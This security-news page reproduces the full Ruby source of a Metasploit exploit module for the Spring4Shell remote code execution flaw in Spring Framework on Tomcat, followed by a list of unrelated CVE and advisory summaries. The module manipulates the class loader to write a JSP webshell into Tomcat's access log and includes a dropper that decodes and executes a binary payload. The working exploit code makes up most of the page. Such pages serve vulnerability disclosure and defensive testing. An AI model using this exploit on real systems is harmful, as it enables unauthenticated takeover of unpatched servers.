Security
Headlines
HeadlinesLatestCVEs

Headline

Spring4Shell Spring Framework Class Property Remote Code Execution

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.

Packet Storm
#web#windows#linux#apache#js#git#java#rce#vmware#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ManualRanking # It's going to manipulate the Class Loader  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Spring Framework Class property RCE (Spring4Shell)',        'Description' => %q{          Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above          and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable          to remote code execution due to an unsafe data binding used to populate an object from request parameters          to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the          org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:          class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can          gain remote code execution.        },        'Author' => [          'vleminator <vleminator[at]gmail.com>'        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-22965'],          ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],          ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']        ],        'Platform' => %w[linux win],        'Payload' => {          'Space' => 5000,          'DisableNops' => true        },        'Targets' => [          [            'Java',            {              'Arch' => ARCH_JAVA,              'Platform' => %w[linux win]            },          ],          [            'Linux',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Platform' => 'linux'            }          ],          [            'Windows',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-03-31',        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Spring4Shell', 'SpringShell'],          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),        OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),      ]    )    register_advanced_options [      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])    ]  end  def jsp_dropper(file, exe)    # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.    dropper = <<~EOS      <%@ page import=\"java.io.FileOutputStream\" %>      <%@ page import=\"java.util.Base64\" %>      <%@ page import=\"java.io.File\" %>      <%        FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);        oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));        oFile.flush();        oFile.close();        File f = new File(\"#{file}\");        f.setExecutable(true);        Runtime.getRuntime().exec(\"#{file}\");      %>    EOS    dropper  end  def modify_class_loader(method, opts)    cl_prefix = 'class.module.classLoader'    send_request_cgi({      'uri' => normalize_uri(target_uri.path.to_s),      'version' => '1.1',      'method' => method,      'headers' => {        'c1' => '<%', # %{c1}i replacement in payload        'c2' => '%>' # %{c2}i replacement in payload      },      "vars_#{method == 'GET' ? 'get' : 'post'}" => {        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],        "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]      }    })  end  def check_log_file    print_status("#{peer} - Waiting for the server to flush the logfile")    print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")    succeeded = retry_until_true(timeout: 60) do      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(@jsp_file)      })      res&.code == 200 && !res.body.blank?    end    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded    print_good("#{peer} - Log file flushed")  end  # Fix the JSP payload to make it valid once is dropped  # to the log file  def fix(jsp)    output = ''    jsp.each_line do |l|      if l =~ /<%.*%>/        output << l      elsif l =~ /<%/        next      elsif l =~ /%>/        next      elsif l.chomp.empty?        next      else        output << "<% #{l.chomp} %>"      end    end    output  end  def create_jsp    jsp = <<~EOS      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");        jsp.delete();      %>      #{Faker::Internet.uuid}    EOS    if target['Arch'] == ARCH_JAVA      jsp << fix(payload.encoded)    else      payload_exe = generate_payload_exe      payload_filename = rand_text_alphanumeric(rand(4..7))      if target['Platform'] == 'win'        payload_path = datastore['WritableDir'] + '\\' + payload_filename      else        payload_path = datastore['WritableDir'] + '/' + payload_filename      end      jsp << jsp_dropper(payload_path, payload_exe)      register_files_for_cleanup(payload_path)    end    jsp  end  def check    @checkcode = _check  end  def _check    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))    )    return CheckCode::Unknown('Web server seems unresponsive') unless res    if res.headers.key?('Server')      res.headers['Server'].match(%r{(.*)/([\d|.]+)$})    else      res.body.match(%r{Apache\s(.*)/([\d|.]+)})    end    server = Regexp.last_match(1) || nil    version = Rex::Version.new(Regexp.last_match(2)) || nil    return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)    vprint_status("Detected #{server} #{version} running")    if datastore['HTTP_METHOD'] == 'Automatic'      # prefer POST over get to keep the vars out of the query string if possible      methods = %w[POST GET]    else      methods = [ datastore['HTTP_METHOD'] ]    end    methods.each do |method|      vars = "vars_#{method == 'GET' ? 'get' : 'post'}"      res = send_request_cgi(        'method' => method,        'uri' => normalize_uri(datastore['TARGETURI']),        vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }      )      # setting the default assertion status to a valid status      send_request_cgi(        'method' => method,        'uri' => normalize_uri(datastore['TARGETURI']),        vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }      )      return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400    end    Exploit::CheckCode::Safe  end  def exploit    prefix_jsp = rand_text_alphanumeric(rand(3..5))    date_format = rand_text_numeric(rand(1..4))    @jsp_file = prefix_jsp + date_format + '.jsp'    http_method = datastore['HTTP_METHOD']    if http_method == 'Automatic'      # if the check was skipped but we need to automatically identify the method, we have to run it here      @checkcode = check if @checkcode.nil?      http_method = @checkcode.details[:method]      fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?      print_good("Automatically identified HTTP method: #{http_method}")    end    # if the check method ran automatically, add a short delay before continuing with exploitation    sleep(5) if @checkcode    # Prepare the JSP    print_status("#{peer} - Generating JSP...")    # rubocop:disable  Style/FormatStringToken    jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')    # rubocop:enable  Style/FormatStringToken    # Modify the Class Loader    print_status("#{peer} - Modifying Class Loader...")    properties = {      payload: jsp,      directory: datastore['PAYLOAD_PATH'],      prefix: prefix_jsp,      suffix: '.jsp',      file_date_format: date_format    }    res = modify_class_loader(http_method, properties)    unless res      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")    end    # No matter what happened, try to 'restore' the Class Loader    properties = {      payload: '',      directory: '',      prefix: '',      suffix: '',      file_date_format: ''    }    modify_class_loader(http_method, properties)    check_log_file    handler  end  # Retry the block until it returns a truthy value. Each iteration attempt will  # be performed with expoential backoff. If the timeout period surpasses, false is returned.  def retry_until_true(timeout:)    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)    ending_time = start_time + timeout    retry_count = 0    while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time      result = yield      return result if result      retry_count += 1      remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)      break if remaining_time_budget <= 0      delay = 2**retry_count      if delay >= remaining_time_budget        delay = remaining_time_budget        vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")      else        vprint_status("Sleeping for #{delay} seconds before attempting again")      end      sleep delay    end    false  endend

Related news

CVE-2023-41726

Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability

CVE-2023-28069: DSA-2022-258: Dell Streaming Data Platform Security Update for Multiple Third-Party Component Vulnerabilities

Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.

CVE-2022-36975

This vulnerability allows remote attackers to bypass authentication on affected installations of Ivanti Avalanche 6.3.2.3490. The specific flaw exists within the ProfileDaoImpl class. A crafted request can trigger execution of SQL queries composed from a user-supplied string. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-15332.

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

4 over-hyped security vulnerabilities of 2022

Categories: Exploits and vulnerabilities Categories: News Tags: wormable Tags: zero-day Tags: spring4shell Tags: cve-2022-34718 Tags: log4j Tags: openssl Tags: cve-2022-36934 Tags: cve-2022-27492 Tags: cve-2022-22965 Tags: cve-2022-22963 What does it take to make the discussion of vulnerabilities useful? And where did this go wrong in 2022? (Read more...) The post 4 over-hyped security vulnerabilities of 2022 appeared first on Malwarebytes Labs.

CVE-2022-38765: Canon Medical Software Security Updates

Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.

CVE-2022-43484: CVE-2022-43484について

TERASOLUNA Global Framework 1.0.0 (Public review version) and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1 are vulnerable to a ClassLoader manipulation vulnerability due to using the old version of Spring Framework which contains the vulnerability.The vulnerability is caused by an improper input validation issue in the binding mechanism of Spring MVC. By the application processing a specially crafted file, arbitrary code may be executed with the privileges of the application.

CVE-2022-21587: Oracle Critical Patch Update Advisory - October 2022

Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

CVE-2022-34102: Crestron Electronics, Inc.

Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.

CVE-2022-32427: Security Bulletin | Printerlogic

PrinterLogic Windows Client through 25.0.0.676 allows attackers to execute directory traversal. Authenticated users with prior knowledge of the driver filename could exploit this to escalate privileges or distribute malicious content.

Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage

A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch

Apple Just Patched 37 iPhone Security Bugs

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

CVE-2022-21586: Oracle Critical Patch Update Advisory - July 2022

Vulnerability in the Oracle Banking Trade Finance product of Oracle Financial Services Applications (component: Infrastructure). The supported version that is affected is 14.5. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Trade Finance. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Banking Trade Finance accessible data as well as unauthorized access to critical data or complete access to all Oracle Banking Trade Finance accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).

Red Hat Security Advisory 2022-4880-01

Red Hat Security Advisory 2022-4880-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Issues addressed include a bypass vulnerability.

RHSA-2022:4880: Red Hat Security Advisory: ACS 3.70 enhancement and security update

Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-23820: json-pointer: type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays * CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion

CVE-2022-28874: Security advisories

Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.

Ruijie Reyee Mesh Router Remote Code Execution

Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.

CVE-2022-21496: Oracle Critical Patch Update Advisory - April 2022

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...

CVE-2022-22968: CVE-2022-22968 | Security

In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.

Microsoft’s Response to CVE-2022-22965 Spring Framework

Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution